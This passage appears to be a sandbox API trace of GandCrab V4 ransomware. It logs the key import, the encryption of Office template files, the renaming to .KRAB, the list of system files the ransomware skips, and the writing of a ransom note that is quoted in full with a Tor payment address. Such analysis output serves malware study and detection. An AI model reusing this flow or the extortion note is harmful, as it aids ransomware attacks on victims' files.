lpProcName="CryptGenRandom") returned 0x779b0df0 [0073.819] CryptGenRandom (in: hProv=0x1012558, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0073.819] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.819] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.820] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0073.892] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x10239f8) returned 1 [0073.892] CryptGetKeyParam (in: hKey=0x10239f8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0073.892] CryptEncrypt (in: hKey=0x10239f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0073.893] GetLastError () returned 0x0 [0073.893] CryptDestroyKey (hKey=0x10239f8) returned 1 [0073.893] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.893] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1011ab8) returned 1 [0073.896] CryptImportKey (in: hProv=0x1011ab8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023938) returned 1 [0073.896] CryptGetKeyParam (in: hKey=0x1023938, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0073.896] CryptEncrypt (in: hKey=0x1023938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0073.896] GetLastError () returned 0x0 [0073.897] CryptDestroyKey (hKey=0x1023938) returned 1 [0073.897] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0073.897] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328990[[fn=varying width list]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0073.897] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0073.897] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0073.898] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0xc03, lpOverlapped=0x0) returned 1 [0073.919] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfffff3fd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.919] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xc03, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0xc03, lpOverlapped=0x0) returned 1 [0073.919] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0073.919] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.923] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.923] CloseHandle (hObject=0x484) returned 1 [0073.924] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.925] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328990[[fn=varying width list]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328990[[fn=varying width list]].glox.krab")) returned 1 [0073.926] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.926] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0073.926] lstrcmpW (lpString1="TM03328998[[fn=Rings]].glox", lpString2=".") returned 1 [0073.926] lstrcmpW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="..") returned 1 [0073.926] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328998[[fn=Rings]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox" [0073.926] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0073.926] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox.KRAB") returned 136 [0073.926] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox") returned 131 [0073.926] lstrlenW (lpString=".glox") returned 5 [0073.926] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.927] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".glox ") returned 6 [0073.927] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.927] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox") returned 131 [0073.927] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox") returned 131 [0073.927] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="desktop.ini") returned 1 [0073.927] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="autorun.inf") returned 1 [0073.927] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="ntuser.dat") returned 1 [0073.927] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="iconcache.db") returned 1 [0073.927] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="bootsect.bak") returned 1 [0073.927] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="boot.ini") returned 1 [0073.927] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="ntuser.dat.log") returned 1 [0073.927] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="thumbs.db") returned 1 [0073.927] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0073.928] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0073.928] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0073.928] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="ntldr") returned 1 [0073.928] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="NTDETECT.COM") returned 1 [0073.928] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="Bootfont.bin") returned 1 [0073.928] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.928] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0073.931] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0073.932] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0073.932] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0073.932] CryptGenRandom (in: hProv=0x1012558, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0073.932] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.932] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.932] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1011ab8) returned 1 [0073.940] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0073.941] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0073.941] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0073.941] CryptGenRandom (in: hProv=0x1011ab8, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0073.941] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0073.941] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.941] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0073.945] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023db8) returned 1 [0073.945] CryptGetKeyParam (in: hKey=0x1023db8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0073.945] CryptEncrypt (in: hKey=0x1023db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0073.945] GetLastError () returned 0x0 [0073.945] CryptDestroyKey (hKey=0x1023db8) returned 1 [0073.945] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.945] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0073.949] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023af8) returned 1 [0073.949] CryptGetKeyParam (in: hKey=0x1023af8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0073.949] CryptEncrypt (in: hKey=0x1023af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0073.949] GetLastError () returned 0x0 [0073.949] CryptDestroyKey (hKey=0x1023af8) returned 1 [0073.949] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.950] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328998[[fn=rings]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0073.950] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0073.950] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0073.951] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x141f, lpOverlapped=0x0) returned 1 [0073.964] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xffffebe1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.964] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x141f, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x141f, lpOverlapped=0x0) returned 1 [0073.964] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0073.964] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.968] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.969] CloseHandle (hObject=0x484) returned 1 [0073.973] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.974] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328998[[fn=rings]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328998[[fn=rings]].glox.krab")) returned 1 [0073.974] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.975] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 0 [0073.975] FindClose (in: hFindFile=0x1023bf8 | out: hFindFile=0x1023bf8) returned 1 [0073.975] CloseHandle (hObject=0x470) returned 1 [0073.975] FindNextFileW (in: hFindFile=0x1023d38, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0073.975] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0073.975] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0073.975] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\d2ca4a08d2ca4dee3d.lock" [0073.975] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0073.976] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 127 [0073.976] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\d2ca4a08d2ca4dee3d.lock") returned 122 [0073.976] lstrlenW (lpString=".lock") returned 5 [0073.976] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.976] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0073.976] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.977] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.977] FindNextFileW (in: hFindFile=0x1023d38, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0073.977] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0073.977] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0073.977] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\KRAB-DECRYPT.txt" [0073.977] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0073.977] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\KRAB-DECRYPT.txt.KRAB") returned 120 [0073.977] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\KRAB-DECRYPT.txt") returned 115 [0073.977] lstrlenW (lpString=".txt") returned 4 [0073.977] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.978] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0073.978] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.978] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\KRAB-DECRYPT.txt") returned 115 [0073.978] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\KRAB-DECRYPT.txt") returned 115 [0073.978] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0073.978] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0073.978] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0073.978] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0073.978] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0073.978] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0073.978] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0073.978] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0073.979] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0073.979] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0073.979] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.979] FindNextFileW (in: hFindFile=0x1023d38, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 0 [0073.979] FindClose (in: hFindFile=0x1023d38 | out: hFindFile=0x1023d38) returned 1 [0073.979] CloseHandle (hObject=0x468) returned 1 [0073.979] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0 [0073.979] FindClose (in: hFindFile=0xfbe0a0 | out: hFindFile=0xfbe0a0) returned 1 [0073.980] CloseHandle (hObject=0x40c) returned 1 [0073.980] FindNextFileW (in: hFindFile=0xfbd620, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0073.980] lstrcmpW (lpString1="User", lpString2=".") returned 1 [0073.980] lstrcmpW (lpString1="User", lpString2="..") returned 1 [0073.980] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\", lpString2="User" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User" [0073.980] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\" [0073.980] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0073.980] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0073.981] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0073.981] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0073.981] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0073.981] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.981] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0073.981] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\\\KRAB-DECRYPT.txt") returned 95 [0073.981] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0073.982] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdB